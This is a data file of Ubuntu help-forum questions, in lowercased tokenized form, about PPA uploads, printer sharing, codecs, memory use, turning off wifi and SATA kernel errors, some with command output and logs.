26129	upload to ppa succeeded but packages does n't appear	i 'm trying to upload packages to my ppa for the first time . i want to use the ppa for customized versions of the openstack compute ( nova ) project , so i tried to do a test by uploading packages corresponding to the bexar release of this project ( lp : nova/bexar ) , with a new version number and changelog entry . i signed the source packages using my opengpg key , which has been uploaded to the ubuntu keyserver : $ dch -v 2011.1-0ubuntu2-isi1 -d lucid `` isi bexar build # 1 '' $ dpkg-buildpackage -s -rfakeroot -tc -d -k4c8a14ab when i tried to upload the files to the repository , it seemed to work ( real email obscured ) : $ dput ppa : lorinh/ppa nova_2011.2~bzr663-1isi1_source.changes checking signature on .changes gpg : signature made fri 11 feb 2011 03:52:50 pm est using rsa key id 4c8a14ab gpg : good signature from `` lorin hochstein < lorin @ ... > '' good signature on /home/lorin/packaging/nova_2011.2~bzr663-1isi1_source.changes . checking signature on .dsc gpg : signature made fri 11 feb 2011 03:52:44 pm est using rsa key id 4c8a14ab gpg : good signature from `` lorin hochstein < lorin @ ... > '' good signature on /home/lorin/packaging/nova_2011.2~bzr663-1isi1.dsc . uploading to ppa ( via ftp to ppa.launchpad.net ) : uploading nova_2011.2~bzr663-1isi1.dsc : done . uploading nova_2011.2~bzr663-1isi1.tar.gz : done . uploading nova_2011.2~bzr663-1isi1_source.changes : done . however , the packages are n't listed on my ppa page . if i try to upload again , i get the error : $ dput ppa : lorinh/ppa nova_2011.2~bzr663-1isi1_source.changes package has already been uploaded to ppa on ppa.launchpad.net nothing more to do for nova_2011.2~bzr663-1isi1_source.changes am i supposed to do something next ? how do i track down what wrong ? as of this writing , it 's been a day and a half since i 've done the upload . edit : i tried this again , and i received the email notification . i used a slightly different set of flags for dpkg-buildpackage the second itme : dpkg-buildpackage -s -sa -rfakeroot -tc -d -k4c8a14ab
26130	how can share my printer so that i can use it with airprint ?	how can i set up ubuntu to share my printer so that i can use it with airprint ? airprint is a system set-up by apple on ios devices ( iphone , ipad , ipod touch )
26134	enable default camera in lenovo t410	i was using lenovo t410 with windows . last week i wiped off windows and installed ubuntu 10.10 as my primary os . now , i am not sure how to install/enable the default camera in ubuntu . i searched lenovo site for ubuntu drivers but they are all for windows only .
26135	where should i store 3rd party jar ( java archive ) files ?	what would be the best place to save jar files of libraries i want to use in a project , that are not in any repositories , and how should i set permissions ? should i put them in /usr/share/java , or is it better to store them somewhere in my home folder ? what would be the most usefull access rights ? does it make sense to follow the convention in /usr/share/java of making a symlink with the package name to the specific version of the jar , and follow the permissions as used there ?
26139	toshiba satellite a300 with maverick keeps crashing	i just installed 10.10 on my girlfriends toshiba satellite a300 and for about two days it has been working just fine for two days but today it started acting pretty wonky . several times over the machine just dies as if it did n't have a battery and someone yanked out the power supply . after such a crash i 'll have to wait a while before powering it up again or it will die before it even reaches the startup screen . it sort of seems like it 's reacting to something i do . i kept it on for several hours while we were out of the house and it was still fine when i came back . i have n't been doing anything i can imagine is especially cpu-intensive when the crashes occur , but i have been trying to set up her ipod with rythmbox and / or banshee . if anyone can point me in the right direction i 'd be very grateful .
26141	how do i find out if there will be a fsck during the next boot ?	is there a way to find out if a filesystem check is scheduled for the next boot ? maybe it 's similar to a forced check , which gets triggered by the existence of the file /forcefsck ?
26142	trouble installing codecs libx264 and libmp3lame	i am trying to use openshot for movie making . my ideal situation is to encode for the web hd , 30 frames per second , to youtube . this works out great as openshot has a setting for this . the problem is when i go to use it i get : '' the following formats/codecs are missing from your system : libx264 libmp3lame you will not be able to use the selected export profile . you will need to install the missing formats/codecs or choose a different export profile . '' i have tried using synaptic package manager and i think i am installing the right `` plugins/codecs '' yet to no avail or success . i used the instructions found here to remedy : https : //answers.launchpad.net/openshot/+faq/1040 i know this impacts other video editing software ( in other words it is not specific just to openshot ) . they give the same type of error message when i try to use their presets as well . so in a word `` help ! '' ... any info is much appreciated ! ! ! ps - if you know of a better way to do this ( another software ) that is appreciated too ! : -d
26147	format of extended partition ?	i would like to understand format of extended partition ( ebr ) meaning exact bit positions and locations of data blocks describing meta info about the following and ( probably ) the next partition . does anybody know the document that describes the format ?
26150	is there a shortcut key for accessing the menu bar ?	is there a shortcut key for accessing the menu bar of an application ? ( not ubuntu 's menu . ) i tried alt and f10 , but no luck . i do n't want to access a specific menu , just the menu bar so i could use the arrows to go between the menus . i 'm using 11.04 alpha-2 .
26154	which is correct for virtualbox memory usage : windows task manager or system monitor ?	i have configured my ubuntu virtualbox install to have a base memory setting of 512mb . when running this install , its fairly sluggish in a way that feels like its thrashing memory . in other words , it will be fine for a little while and then suddenly run like a pig for a minute or two . this happens when running a couple of terminals , eclipse w/ a pydev django project , and firefox , or really any combination of a few applications . when i look in windows task manager , the virtualbox.exe that corresponds to this ubuntu machine is hovering at about 100mb-120mb . when i look at system monitor within ubuntu , i see that it says for memory `` 329.3 mib ( 66.3 % ) of 496.6 mib '' and for swap `` 138.6 mib ( 38.0 % ) of 365.0 mib '' . so my first question is , which of these numbers do i believe ? ( and why the difference ? ) my second question is , how can i convince ubuntu to use the memory i 've given it , assuming it will improve performance .
26160	how do i install these printing and mail related utilities ?	my job wants me to install the following utilities on our ubuntu server : lp lpstat cancel mail i have no idea how to do it . thank you very much in advance for your time .
26163	how to have up to date software and more open source software in the software centre ?	i would like to have a better selection of free software in the software centre and have newer versions of the packages . how can i achieve this ?
26168	is it possible to play videos on a amd hd 6850 ?	i 'm running catalyst version 11.1 with my amd hd 6850 gpu . i 've set up very basic and minimal x.org config through gedit , because my card is n't fully supported by fglrx to auto-configure . as i predicted , the amd unsupported hardware watermark came up . i used a special .sh script to remove it . however , i still ca n't resolve the video problem . when i try to play videos via totem , i get a black screen . while opengl works fine , youtube videos and kmplayer , totem just ca n't render anything . i 'm sure that has something to do with fglrx itself or with x.org configuration . if you have any suggestions , i 'd like to hear them . thanks in advance . linux ubuntu 2.6.35-25-generic # 44-ubuntu smp fri jan 21 17:40:48 utc 2011 i686 gnu/linux
26169	warning : library configuration mismatch when running ffmpeg	well , just typing ffmpeg on command line gives me lots of spam . i 'm perfectly comfortable with that till it does not break my files , but ... is there any way to troubleshoot/fix that ? $ ffmpeg ffmpeg version 0.6-4:0.6-2ubuntu6 , copyright ( c ) 2000-2010 the ffmpeg developers built on oct 5 2010 22:35:47 with gcc 4.4.5 configuration : -- extra-version=4:0.6-2ubuntu6 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static warning : library configuration mismatch libavutil configuration : -- extra-version=4:0.6-2ubuntu3+medibuntu1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libdirac -- enable-libgsm -- enable-libopenjpeg -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-libmp3lame -- enable-libfaac -- enable-nonfree -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libfaad -- enable-libxvid -- enable-libx264 -- enable-librtmp -- enable-libopencore-amrnb -- enable-version3 -- enable-libopencore-amrwb -- enable-version3 -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavcodec configuration : -- extra-version=4:0.6-2ubuntu3+medibuntu1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libdirac -- enable-libgsm -- enable-libopenjpeg -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-libmp3lame -- enable-libfaac -- enable-nonfree -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libfaad -- enable-libxvid -- enable-libx264 -- enable-librtmp -- enable-libopencore-amrnb -- enable-version3 -- enable-libopencore-amrwb -- enable-version3 -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavformat configuration : -- extra-version=4:0.6-2ubuntu6 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavdevice configuration : -- extra-version=4:0.6-2ubuntu6 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavfilter configuration : -- extra-version=4:0.6-2ubuntu6 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libswscale configuration : -- extra-version=4:0.6-2ubuntu6 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libpostproc configuration : -- extra-version=4:0.6-2ubuntu6 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavutil 50.15 . 1 / 50.15 . 1 libavcodec 52.72 . 2 / 52.72 . 2 libavformat 52.64 . 2 / 52.64 . 2 libavdevice 52 . 2 . 0 / 52 . 2 . 0 libavfilter 1.19 . 0 / 1.19 . 0 libswscale 0.11 . 0 / 0.11 . 0 libpostproc 51 . 2 . 0 / 51 . 2 . 0 $ uname -a linux arcano 2.6.35-25-generic # 44-ubuntu smp fri jan 21 17:40:48 utc 2011 i686 gnu/linux
26172	can i use all my ram for application data ?	i have yet another question about `` where is my linux memory '' question goes : can i use cache for application data ? on my laptop i have 1gb ram . situation after some time of work : browser takes 400mb and all other apps caa 300mb ( quickly summed in system monitor ) . system monitor says i use 90 % of ram and i have already 200mb on swap . laptop is getting slower when i start new things ( e.g . open new tab in browser or open new nautilus window ) . probably putting memory on swap so there should be 1200mb ( ram+swap ) used but all app i see uses only 600mb . where are other 600mb ? out of this 600mb there is 400mb real ram . i am not copying or any other massive io activity . i read about linux smartly uses all ram it has using buffers and cache . so , kernel ( cache ) uses 300mb . what if i do n't want to have disk mirrored and i want to use memory for application data ( e.g . new browser tab ) ? i do n't need 200mb of mirrored disk data , because i ( for example ) wo n't use open the same photos on data partition i just seen . so can i use all my ram for application data ? ( including browser , desktop , xorg , other services ) . how ?
26176	how do i turn off mouse acceleration ?	i would like to turn off mouse acceleration to begin training my hand for better accuracy and precision in my mouse movements . how can i do this in ubuntu 10.10 ?
26177	netbeans 6.8 refuses to close	i am using netbeans in ubuntu 10.04 . after updation of netbeans from version 6.8 to version 6.9 , netbeans refuses to close . when i exit netbeans , it immediately restarts again . it will constantly do it until i reboot the machine . how can i solve this issue ?
26179	what do the groups do in `` users and groups '' ?	i know that some define permissions on the file system ( such as www-data ) . but i do n't understand why this question was answered successfully by adding a user to the `` video '' group . so the question is mainly what do all the pre-built groups do in ubuntu ? more reasonably , since there are so many , what `` special '' groups exist and how or when should they be used ?
26182	when are `` user privileges '' relevant ?	i notice that many of the user privileges in `` users and groups '' are not ticked on my user , but i still have access to the items they specify . for example , i 'm constantly using virtualbox for virtualisation , i can connect to wireless and wired networks and i can plug in and use any audio device . when are these privileges honoured ? how useful are they ?
26185	share screen with multiple viewers ?	i need a cross platform screen sharing solution for a presentation . users might have windows , mac or linux ... i 've successfully hosted before with yugma , but after upgrading to 10.10 i ca n't get it to work on my main box . i would potentially use teamviewer , but the `` presentation '' mode does n't work with ubuntu as the host . anyone have other suggestions ?
26186	how to install a package not found in synaptic package manager	i would like to install a package but do n't find it in synaptic package manager . i was wondering how to find out the repository of the package and add it to synaptic package manager so that i can find it and install it from there ? for example , this is the case when i am now looking for `` djvused '' under 10.10 synaptic package manager thanks and regards !
26190	why ca n't i install clamcour ?	sudo apt-get install clamcour leyendo lista de paquetes ... hecho creando ã¡rbol de dependencias leyendo la informaciã³n de estado ... hecho e : no se ha podido localizar el paquete clamcour ricardo @ laboratorio : ~ $ it says can not localize the package clamcour , i updated the os , and also uncommented the repositories on sources.list . what can i do to install clamcour on this server ? thanks in advance .
26197	installing an operating system from an .iso file	i am trying to install a build of chromium os on my pc . i do not have any spare disks or flash drives . i want to find a way from installing the .iso from ubuntu live cd . how would i go about doing this ? my friend suggested mounting the .iso , but i do n't know what he 's talking about .
26199	how to switch off wifi on startup or from the console	i have installed ubuntu 10.04 on a laptop . wifi is switched on by default on startup . i can disable it rightclicking the network manager icon in the gnome bar . how can i set it to have wifi switched off as default ? alternatively , how can i switch off wifi on the console ? i tried already the rfkill command but it does not list any devices and it does not switch off wifi , i tried different parameters . this is a standard install of the ubuntu 10.04 i386 desktop live cd on an ibm t40 laptop . edit a : this is the output of some rfkill commands on my system , and it does not affect the wifi of the laptop : $ rfkill -- help usage : rfkill [ options ] command options : -- version show version ( 0.4 ) commands : help event list [ identifier ] block identifier unblock identifier where identifier is the index no . of an rfkill switch or one of : < idx > all wifi wlan bluetooth uwb ultrawideband wimax wwan gps fm $ rfkill list $ rfkill list wifi $ rfkill list all $ rfkill list wlan $ sudo rfkill list all $ sudo rfkill block all $ sudo rfkill block wlan $ sudo rfkill block wifi $ edit b : now i found out that sudo ifconfig eth1 down turns it off . and i can turn it on through the gnome network applet again . but the applet does not reflect the change from the commandline , it stills believes wifi is switched on . i have to switch it off and on again on the applet to switch it on again , when i switched it off from the console . is there a better way ? this is what the syslog looks like when i switch wireless off and on again from the network manager : networkmanager : < info > ( eth1 ) : device state change : 3 - > 2 ( reason 0 ) networkmanager : < info > ( eth1 ) : deactivating device ( reason : 0 ) . networkmanager : < info > policy set '24 ' ( eth0 ) as default for routing and dns . networkmanager : < info > ( eth1 ) : taking down device . avahi-daemon [ 660 ] : withdrawing address record for fe80 : :202:8aff : feba : d798 on eth1 . kernel : [ 971.472116 ] airo ( eth1 ) : cmd:3 status:7f03 rsp0:0 rsp1:0 rsp2:0 networkmanager : < info > ( eth1 ) : bringing up device . networkmanager : < info > ( eth1 ) : supplicant interface state : starting - > ready networkmanager : < info > ( eth1 ) : device state change : 2 - > 3 ( reason 42 ) avahi-daemon [ 660 ] : registering new address record for fe80 : :202:8aff : feba : d798 on eth1.* . kernel : [ 965.512048 ] eth1 : no ipv6 routers present edit c : it works somehow now , but in a hacky way , not very nice . i added a line to rc.local , just before exit 0 : $ cat /etc/rc.local # ! /bin/sh -e # turn off wifi on boot : ifconfig eth1 down exit 0 when i start the machine , wifi comes up , and after an instance it is turned off . this must be the effect of the standard configuration of ubuntu that turns it on , then my script ifconfig eth1 down kicks in and turns it off . and network manager does not realize that it was turned off and thinks it is still on . it would be desirable to configure network manager 's so that the standard state when turning on the machine can be on or off , and not only on
26200	text editor with syntax highlighting , theme support and codee folding	i like notepad++ under windows . i was wondering if there are some similar ones for ubuntu ? or just the powerful and convenient one in your opinion . features that i like are : syntax highlighting for language x theme support line numbering code folding regex style powerful , yet not resource-consuming
26204	acer aspire one and kernel 2.6.35-25 freeze	i 'm having a problem with an acer aspire one netbook after the latest kernel upgrade . basically , doing anything relating to an external monitor locks the trackpad , and in some cases , the keyboard as well . this lock will continue in gnome even after reboots , and requires battery removal to fix . it does work in the graphical login manager up until the problem occurs the first time . and ideas on settings , etc , that i can change to make it work again ?
26205	what is needed to see nas drive ?	if i use windows xp the drive is seen in the network it is not seen in ubuntu 's network . i do know and can use connect to a server but the question is really not about that . i would like to know if the windows functionality can be obtained in ubuntu ?
26209	if i change my home from ext3 to ext4 when installing will my data be lost ?	if i change my home from ext3 to ext4 when installing will my data be lost ?
26214	tell launchpad what deb_build_options to use when building ppa package	when i generate and upload source packages to my ppa , what 's the best way to pass deb_build_options that launchpad will use when building binary versions of the package ? in particular , i want to pass in the `` nodocs '' option so that the documentation is n't built .
26217	macbook pro late 2009 sata resets , slowness ( is my motherboard dying on both machines ? )	my macbook pro runs slower the longer it 's on . i am getting kernel warnings . some , but not all , resets correlate with ac power connects and disconnects . i do n't think the warnings do . ( how do i tell ? ) what are these errors ? what causes them ? can this damage the drive or corrupt data ? what is it seeing that motivates these ? 02:37:16 [ 0.791992 ] ahci 0000:00:0b.0 : pci int a - > link [ lsi0 ] - > gsi 20 ( level , low ) - > irq 20 02:37:16 [ 0.792047 ] ahci 0000:00:0b.0 : irq 43 for msi/msi-x 02:37:16 [ 0.792053 ] ahci 0000:00:0b.0 : controller ca n't do pmp , turning off cap_pmp 02:37:16 [ 0.792104 ] ahci 0000:00:0b.0 : ahci 0001.0200 32 slots 6 ports 1.5 gbps 0x3 impl ide mode 02:37:16 [ 0.792107 ] ahci 0000:00:0b.0 : flags : 64bit ncq sntf pm led pio slum part boh 02:37:16 [ 0.792111 ] ahci 0000:00:0b.0 : setting latency timer to 64 02:37:16 [ 0.813473 ] scsi0 : ahci 02:37:16 [ 0.823340 ] scsi1 : ahci 02:37:16 [ 0.848164 ] ata1 : sata max udma/133 abar m8192 @ 0xe7484000 port 0xe7484100 irq 43 02:37:16 [ 0.848166 ] ata2 : sata max udma/133 abar m8192 @ 0xe7484000 port 0xe7484180 irq 43 02:37:16 [ 1.190132 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:16 [ 1.190153 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:16 [ 1.213568 ] ata1.00 : ata-8 : ocz-vertex2 , 1.23 , max udma/133 02:37:16 [ 1.213572 ] ata1.00 : 195371568 sectors , multi 1 : lba48 ncq ( depth 31/32 ) 02:37:16 [ 1.227293 ] ata2.00 : ata-8 : st9500420asg , 0002sdm1 , max udma/133 02:37:16 [ 1.227297 ] ata2.00 : 976773168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) 02:37:16 [ 1.229570 ] ata2.00 : configured for udma/133 02:37:16 [ 1.240120 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5850000 action 0xe frozen 02:37:16 [ 1.240123 ] ata2 : irq_stat 0x00000040 , connection status changed 02:37:16 [ 1.240127 ] ata2 : serror : { phyrdychg commwake linkseq trstatrns devexch } 02:37:16 [ 1.240133 ] ata2 : hard resetting link 02:37:16 [ 1.260738 ] ata1.00 : configured for udma/133 02:37:16 [ 1.280111 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5850000 action 0xe frozen 02:37:16 [ 1.280114 ] ata1 : irq_stat 0x00000040 , connection status changed 02:37:16 [ 1.280118 ] ata1 : serror : { phyrdychg commwake linkseq trstatrns devexch } 02:37:16 [ 1.280122 ] ata1 : hard resetting link 02:37:16 [ 1.990101 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:16 [ 1.994215 ] ata2.00 : configured for udma/133 02:37:16 [ 1.994220 ] ata2 : eh complete 02:37:16 [ 2.030097 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:16 [ 2.090773 ] ata1.00 : configured for udma/133 02:37:16 [ 2.090778 ] ata1 : eh complete 02:37:16 [ 2.090931 ] scsi 0:0:0:0 : direct-access ata ocz-vertex2 1.23 pq : 0 ansi : 5 02:37:16 [ 2.091045 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 02:37:16 [ 2.091121 ] sd 0:0:0:0 : [ sda ] 195371568 512-byte logical blocks : ( 100 gb/93.1 gib ) 02:37:16 [ 2.091159 ] scsi 1:0:0:0 : direct-access ata st9500420asg 0002 pq : 0 ansi : 5 02:37:16 [ 2.091163 ] sd 0:0:0:0 : [ sda ] write protect is off 02:37:16 [ 2.091165 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 02:37:16 [ 2.091183 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua 02:37:16 [ 2.091252 ] sd 1:0:0:0 : attached scsi generic sg1 type 0 02:37:16 [ 2.091446 ] sd 1:0:0:0 : [ sdb ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) 02:37:16 [ 2.091580 ] sd 1:0:0:0 : [ sdb ] write protect is off 02:37:16 [ 2.091582 ] sd 1:0:0:0 : [ sdb ] mode sense : 00 3a 00 00 02:37:16 [ 2.091637 ] sd 1:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua 02:37:16 [ 2.093140 ] sd 0:0:0:0 : [ sda ] attached scsi disk 02:37:16 [ 2.093773 ] sd 1:0:0:0 : [ sdb ] attached scsi disk 02:37:16 [ 2.693899 ] ext4-fs ( dm-0 ) : mounted filesystem with ordered data mode . opts : ( null ) 02:37:16 [ 5.483492 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro 02:37:16 [ 7.905040 ] ext4-fs ( dm-2 ) : mounted filesystem with ordered data mode . opts : ( null ) 02:37:25 [ 19.553095 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=600 02:37:25 [ 19.555266 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=600 02:37:25 [ 19.641532 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen t4 02:37:25 [ 19.641532 ] ata1 : irq_stat 0x00000040 , connection status changed 02:37:25 [ 19.641532 ] ata1 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:37:25 [ 19.641533 ] ata1 : hard resetting link 02:37:25 [ 19.642076 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen t4 02:37:25 [ 19.642078 ] ata2 : irq_stat 0x00000040 , connection status changed 02:37:25 [ 19.642081 ] ata2 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:37:25 [ 19.642084 ] ata2 : hard resetting link 02:37:26 [ 20.392606 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:26 [ 20.392610 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:26 [ 20.396697 ] ata2.00 : configured for udma/133 02:37:26 [ 20.396703 ] ata2 : eh complete 02:37:26 [ 20.451491 ] ata1.00 : configured for udma/133 02:37:26 [ 20.451498 ] ata1 : eh complete 02:37:30 [ 24.563725 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=600 02:37:30 [ 24.565939 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=600 02:37:30 [ 24.627236 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5900000 action 0xe frozen t4 02:37:30 [ 24.627240 ] ata1 : irq_stat 0x00000040 , connection status changed 02:37:30 [ 24.627242 ] ata1 : serror : { dispar linkseq trstatrns devexch } 02:37:30 [ 24.627246 ] ata1 : hard resetting link 02:37:30 [ 24.632241 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen t4 02:37:30 [ 24.632244 ] ata2 : irq_stat 0x00000040 , connection status changed 02:37:30 [ 24.632247 ] ata2 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:37:30 [ 24.632250 ] ata2 : hard resetting link 02:37:31 [ 25.372582 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:31 [ 25.382615 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) 02:37:31 [ 25.386782 ] ata2.00 : configured for udma/133 02:37:31 [ 25.386788 ] ata2 : eh complete 02:37:31 [ 25.431668 ] ata1.00 : configured for udma/133 02:37:31 [ 25.431674 ] ata1 : eh complete 02:45:54 [ 529.141844 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=0 02:45:55 [ 529.544529 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=0 02:45:55 [ 529.622561 ] ata1 : limiting sata link speed to 1.5 gbps 02:45:55 [ 529.622568 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5850000 action 0xe frozen 02:45:55 [ 529.622572 ] ata1 : irq_stat 0x00400040 , connection status changed 02:45:55 [ 529.622576 ] ata1 : serror : { phyrdychg commwake linkseq trstatrns devexch } 02:45:55 [ 529.622583 ] ata1 : hard resetting link 02:45:55 [ 529.622609 ] ata2 : limiting sata link speed to 1.5 gbps 02:45:55 [ 529.622613 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen 02:45:55 [ 529.622616 ] ata2 : irq_stat 0x00000040 , connection status changed 02:45:55 [ 529.622620 ] ata2 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:45:55 [ 529.622624 ] ata2 : hard resetting link 02:45:56 [ 530.380135 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:45:56 [ 530.380157 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:45:56 [ 530.384305 ] ata2.00 : configured for udma/133 02:45:56 [ 530.384314 ] ata2 : eh complete 02:45:56 [ 530.399225 ] ata1.00 : configured for udma/133 02:45:56 [ 530.399233 ] ata1 : eh complete 02:45:58 [ 532.395990 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=600 02:45:58 [ 532.518270 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=600 02:45:58 [ 532.590968 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5840000 action 0xe frozen t4 02:45:58 [ 532.590973 ] ata1 : irq_stat 0x00000040 , connection status changed 02:45:58 [ 532.590977 ] ata1 : serror : { commwake linkseq trstatrns devexch } 02:45:58 [ 532.590983 ] ata1 : hard resetting link 02:45:58 [ 532.591034 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen t4 02:45:58 [ 532.591037 ] ata2 : irq_stat 0x00000040 , connection status changed 02:45:58 [ 532.591041 ] ata2 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:45:58 [ 532.591045 ] ata2 : hard resetting link 02:45:59 [ 533.340147 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:45:59 [ 533.340168 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:45:59 [ 533.344416 ] ata2.00 : configured for udma/133 02:45:59 [ 533.344424 ] ata2 : eh complete 02:45:59 [ 533.360839 ] ata1.00 : configured for udma/133 02:45:59 [ 533.360847 ] ata1 : eh complete 02:45:59 [ 533.584449 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=0 02:45:59 [ 533.586999 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=0 02:45:59 [ 533.660117 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen 02:45:59 [ 533.660122 ] ata2 : irq_stat 0x00000040 , connection status changed 02:45:59 [ 533.660126 ] ata2 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:45:59 [ 533.660132 ] ata2 : hard resetting link 02:45:59 [ 533.660141 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5850000 action 0xe frozen 02:45:59 [ 533.660143 ] ata1 : irq_stat 0x00000040 , connection status changed 02:45:59 [ 533.660147 ] ata1 : serror : { phyrdychg commwake linkseq trstatrns devexch } 02:45:59 [ 533.660151 ] ata1 : hard resetting link 02:46:00 [ 534.412536 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:00 [ 534.412562 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:00 [ 534.416768 ] ata2.00 : configured for udma/133 02:46:00 [ 534.416777 ] ata2 : eh complete 02:46:00 [ 534.431396 ] ata1.00 : configured for udma/133 02:46:00 [ 534.431401 ] ata1 : eh complete 02:46:03 [ 537.384649 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=600 02:46:03 [ 537.504214 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=600 02:46:03 [ 